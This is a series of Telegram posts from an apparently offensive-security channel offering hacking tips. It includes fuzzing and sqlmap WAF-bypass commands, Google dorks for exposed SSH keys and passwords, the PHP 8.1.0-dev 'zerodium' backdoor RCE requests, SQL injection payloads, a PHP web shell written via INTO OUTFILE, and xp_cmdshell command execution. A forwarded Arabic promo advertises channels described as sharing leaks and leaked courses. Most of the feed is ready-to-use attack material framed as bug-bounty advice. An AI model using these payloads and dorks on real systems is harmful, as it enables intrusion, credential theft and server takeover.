This media is not supported in your browser
VIEW IN TELEGRAM
Bruteforce directories and files :
a simple example of using gobuster , but you can also work with ffuf , feroxbuster and other tools
• dir : directory scanning mode
• -u : target URL
• -w : path to dictionary
Other useful parameters:
• -x : file extensions ( .php , .html )
• -t : number of threads
• -c : cookie
a simple example of using gobuster , but you can also work with ffuf , feroxbuster and other tools
• dir : directory scanning mode
• -u : target URL
• -w : path to dictionary
Other useful parameters:
• -x : file extensions ( .php , .html )
• -t : number of threads
• -c : cookie
🔥10
ExploitQuest
Photo
A simple CSRF bypass to check if your target is sending JSON data without an anti-CSRF token
Change the content type from application/json to text/plain and see if it still accepts the request
Steps to Check for CSRF Bypass
Identify the Target Request:
Find the endpoint that accepts JSON data and requires CSRF protection.
Capture the Request:
Use tools like Burp Suite, Postman, or browser developer tools to capture the original request.
Original Request (expected by the server):
POST /api/profile HTTP/2
Host: app.example.com
Cookie: sess=eyJ... # Session Cookie
Content-Type: application/json
{
"email": "test@example.com"
}
Modified Request (for testing CSRF bypass):
POST /api/profile HTTP/2
Host: app.example.com
Cookie: sess=eyJ... # Session Cookie
Content-Type: text/plain
{
"email": "test@example.com"
}
Expected Results:
If the server accepts the request:
The endpoint may not validate the Content-Type.
This can allow a malicious actor to exploit the endpoint using CSRF.
If the server rejects the request:
It validates the Content-Type, which is a good security practice.
This reduces the risk of CSRF exploitation
❤7👍2
One line to find all subdomains of a target site and list the favicon hashes.
The latter can be used in conjunction with Shodan to find all web applications using the same favicon.
The latter can be used in conjunction with Shodan to find all web applications using the same favicon.
subfinder -d canva.com | httpx -favicon -j | jq -r .favicon | grep -v null | sort-u
🔥3
Bypass waf for SQL injection :)
cloudflare
command :
time-based blind:
cloudflare
command :
sqlmap -u "target.com" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment,betweeny
time-based blind:
+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)
🔥7👍4❤2
Here are 10 Google Dorks that are new and useful for bug bounty hunters during reconnaissance:
1•Finding Configuration or Settings Files
inurl:settings filetype:json OR filetype:xml
•Purpose: Locate configuration files that might contain sensitive keys or settings.
2•Searching for Backup Files on Servers
intitle:index.of "backup" OR "bkp" OR "bak"
•Purpose: Identify exposed backup files in public directories.
3•Discovering Application Error Logs
inurl:error.log OR inurl:debug.log filetype:log
•Purpose: Find log files that may reveal sensitive server paths or IP addresses.
4•Locating Database Configuration Files
inurl:dbconfig OR inurl:database filetype:ini OR filetype:env
•Purpose: Expose database settings or credentials.
5•Finding Exposed API Endpoints
inurl:api OR inurl:swagger filetype:json
•Purpose: Identify exposed APIs or Swagger documentation.
6•Searching for Private SSH Keys
intitle:index.of id_rsa OR id_dsa filetype:key
•Purpose: Detect publicly accessible SSH private keys.
7•Exposing Hardcoded Passwords
intext:"password=" OR "pwd=" OR "pass=" filetype:properties OR filetype:txt
•Purpose: Find plaintext passwords in configuration or text files.
8•Finding Confidential Documents
site:example.com filetype:pdf OR filetype:xls "confidential"
•Purpose: Locate sensitive or confidential documents.
9•Detecting Files with Exported Data
inurl:exports OR inurl:downloads filetype:csv OR filetype:txt
•Purpose: Discover exported user data or logs.
10•Identifying Cloud Configuration Files
intext:"cloud" OR "aws" OR "gcp" filetype:yml OR filetype:yaml
•Purpose: Expose cloud service configurations such as AWS or GCP.
👍11❤4🔥4
How do hackers find hidden pages on your site?
It's not magic, it's technique.
It's called Web Fuzzing.
And if you're a developer, a pentester, or just curious, you know that this method is daunting.
Here is a quick example with a well-known tool, but that admins forget too quickly: FFUF (Fuzz Faster U Fool).
🛠 Examples of use:
• Fuzzing with custom headers:
• Recursive Fuzzing with Specific Depth:
• Targeting specific patterns in responses:
Why does it work?
Because sites are like untidy houses. There is always a door left ajar.
Fuzzing uses lists of words (often obvious combinations or common names) to force URLs, explore forgotten areas... and reveal login pages, more or less sensitive resources.
But the real danger? It is not the tool.
It is a site that was designed without taking these attacks into account.
It's not magic, it's technique.
It's called Web Fuzzing.
And if you're a developer, a pentester, or just curious, you know that this method is daunting.
Here is a quick example with a well-known tool, but that admins forget too quickly: FFUF (Fuzz Faster U Fool).
🛠 Examples of use:
• Fuzzing with custom headers:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -H "Custom-Header: value"
• Recursive Fuzzing with Specific Depth:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -recursion -recursion-depth 2
• Targeting specific patterns in responses:
ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -mr "regex-pattern"
Why does it work?
Because sites are like untidy houses. There is always a door left ajar.
Fuzzing uses lists of words (often obvious combinations or common names) to force URLs, explore forgotten areas... and reveal login pages, more or less sensitive resources.
But the real danger? It is not the tool.
It is a site that was designed without taking these attacks into account.
🔥6👍1
PHP 8.1.0-dev RCE via User-Agentt Exploit
Introduction
In some versions of PHP 8.1.0-dev, a Remote Code Execution (RCE) vulnerability was discovered through an uncommon HTTP header called User-Agentt. This vulnerability can be exploited if the application processes incoming headers without proper sanitization, allowing arbitrary system commands to be executed on the server.
How Does the Vulnerability Work?
The vulnerability occurs when the application uses
$_SERVER['HTTP_USER_AGENTT']
unsafely, especially if the value is passed to functions like eval() or system().
If input validation is not implemented, attackers can execute unauthorized commands directly on the server.
Example of Vulnerable PHP Code
<?php
$user_agent = $_SERVER['HTTP_USER_AGENTT'];
eval($user_agent);
?>
Why is this dangerous?
Because an attacker can send an HTTP request with a User-Agentt header containing malicious PHP code, which will be executed directly on the server.
How to Exploit the Vulnerability
1. Testing Delay with sleep()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsleep(5);
•If the response is delayed by 5 seconds, it confirms that the code is being executed successfully.
2. Executing a System Command
with system()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumsystem('id');
•If the server responds with user information such as:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
•this means RCE exploitation is successful.
3. Executing PHP via phpinfo()
GET /index.php HTTP/1.1
Host: vulnerable.com
User-Agentt: zerodiumphpinfo();
•This might display the current PHP configuration, which helps in understanding the target environment.
Conclusion
This vulnerability is extremely dangerous because it allows direct command execution on the server, potentially leading to a full compromise. Developers must be cautious about handling external inputs and always keep their PHP versions up to date.
#ExploitQuest #ExploitQuest
@ExploitQuest
👍5❤1
Forwarded from Global Red Team
أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@iiLinux
@GlobalRedHat
@k7ali_linux
@ExploitQuest
@iiMrDark
@Wa3i_Tech
@codearabs
@Egyshield
@GlobalRedTeam
@darkcsc
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.
@iiLinux
قناة عامة تقوم بنشر التقنيات العامة و تتميز بشروحات لينكس.
@GlobalRedHat
المجتمع الرسمي للقراصنة ذوي القبعة الحمراء.
@k7ali_linux
قناة تخص شروحات كالي لينكس بشكل مختلف ومتميز.
@ExploitQuest
قناة تهتم باكتشاف الثغرات و استغلالها بالإضافة إلى الشروحات المميزة فيها.@EgyptianshieldTOOLS
قناة خاصة بالأدوات المستخدمة في البرمجة والأمن السيبراني.
@iiMrDark
قناة تقدم محتوى خاص بالتسريبات والبرامج.
@Wa3i_Tech
قناة تقدم الوعي في الأمن السيبراني وشروحات مبسطة.
@codearabs
قناة مختصة بتسريب كورسات الشركات المشهورة في المجالات التقنية.
@Egyshield
قناة مختصة بالشروحات والأخبار التقنية وتحديداً في البرمجة والأمن السيبراني.
@GlobalRedTeam
المجتمع الرسمي لـGlobal Red Team
@darkcsc
قناة خاصة بعلم الحاسوب وتحتوي على شروحات تخص الحاسوب بشكل عام.
Forwarded from Global Red Hat
Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi
SQL Injection (SQLi) is one of the most critical web vulnerabilities, allowing an attacker to manipulate database queries, extract sensitive data, modify records, or even execute system commands (RCE - Remote Code Execution).
This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE.
━━━━━━━━━━━━━━━━━━
1. Discovering SQL Injection Vulnerabilities in Multiple Ways
🔹Method 1: Manual Testing with Special Characters
The simplest way to test for SQL Injection is by inserting special characters such as:
'
"
--
#
;
Example 1: Injecting a Single Quote
'
If a website has a login page like:
https://example.com/login.php?user=admin
Try entering:
https://example.com/login.php?user=admin'
If an error appears like:
You have an error in your SQL syntax...
It indicates an SQL Injection vulnerability.
━━━━━━━━━━━━━━━━━━
🔹Method 2: Injecting Simple SQL Queries
If the backend SQL query looks like this:
SELECT * FROM users WHERE username = '$user' AND password = '$pass'
You can try the following payloads:
admin' --
or
' OR '1'='1' --
If you gain access without entering a password, the application is vulnerable.
━━━━━━━━━━━━━━━━━━
🔹 Method 3: Using SQLMap for Automated Testing
🔹 SQLMap is a powerful tool for automated SQL Injection detection. Run:
sqlmap -u "https://example.com/login.php?user=admin" --dbs
SQLMap will analyze the URL and extract the database names if vulnerable.
━━━━━━━━━━━━━━━━━━
🔹Method 4: Testing with SQL Sleep (Time-Based SQLi)
If error messages are hidden, you can test for Time-Based SQLi:
https://example.com/page?id=1' AND SLEEP(5) --
If the page takes 5 seconds to load, the database is likely vulnerable.
━━━━━━━━━━━━━━━━━━
🔹Method 5: Data Extraction via UNION-Based SQL Injection
If a website displays data from a database, try injecting a UNION SELECT query:
https://example.com/page?id=1 UNION SELECT 1,2,3,4 --
If numbers or unexpected data appear, the website is vulnerable.
━━━━━━━━━━━━━━━━━━
2. Escalating SQL Injection to RCE (Remote Code Execution)
If SQL Injection allows file operations via LOAD_FILE() or OUTFILE, you can execute commands on the server.
🔹Example: Uploading a Web Shell via SQLi
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
Now, access the shell through:
http://target.com/shell.php?cmd=whoami
🔹If SQL Server has xp_cmdshell enabled, execute system commands like:
EXEC xp_cmdshell 'whoami';
This will return the current system user running the database service.
━━━━━━━━━━━━━━━━━━
3. Exploiting SQL Injection to Gain Admin Access
In some cases, SQLi can be used to escalate privileges by modifying session data:
UPDATE users SET is_admin = 1 WHERE username = 'victim';
Or steal an admin session:
SELECT session_id FROM users WHERE username = 'admin';
💡 Conclusion
•Test manually using ' and OR 1=1
•Use SQLMap for automatic SQLi detection
•Escalate SQLi to RCE if the system allows file operations
•Test SQL Sleep (Time-Based Injection) for hidden errors
•Use UNION SELECT to extract sensitive data
━━━━━━━━━━━━━━━━━━
🚀 Join now
[https://t.me/ExploitQuest]
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering
Telegram
ExploitQuest
contact: @ExploitQuestbot
👍11❤6
CORS one liner command exploiter
This is an extremely helpful and practical Cheatsheet for Bug Hunters, which helps you find CORS missconfiguration in every possible method. Simply replace https://example.com with the URL you want to target. This will help you scan for CORS vulnerability without the need of an external tool. What you have to do is to copy-and-paste the commands into your terminal and finger crossed for any possible CORS.
Github
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
GitHub
GitHub - kleiton0x00/CORS-one-liner: A one liner Bash command which finds CORS in every possible endpoint.
A one liner Bash command which finds CORS in every possible endpoint. - kleiton0x00/CORS-one-liner
👍5👏5
Media is too big
VIEW IN TELEGRAM
"I discovered a vulnerability in a website that allowed me to escalate my privileges from a regular user to an admin. This privilege escalation granted me access to other users' data, the full database, and the admin control panel."
https://t.me/ExploitQuest
https://t.me/ExploitQuest
❤22🤯10👍4🔥3🤷2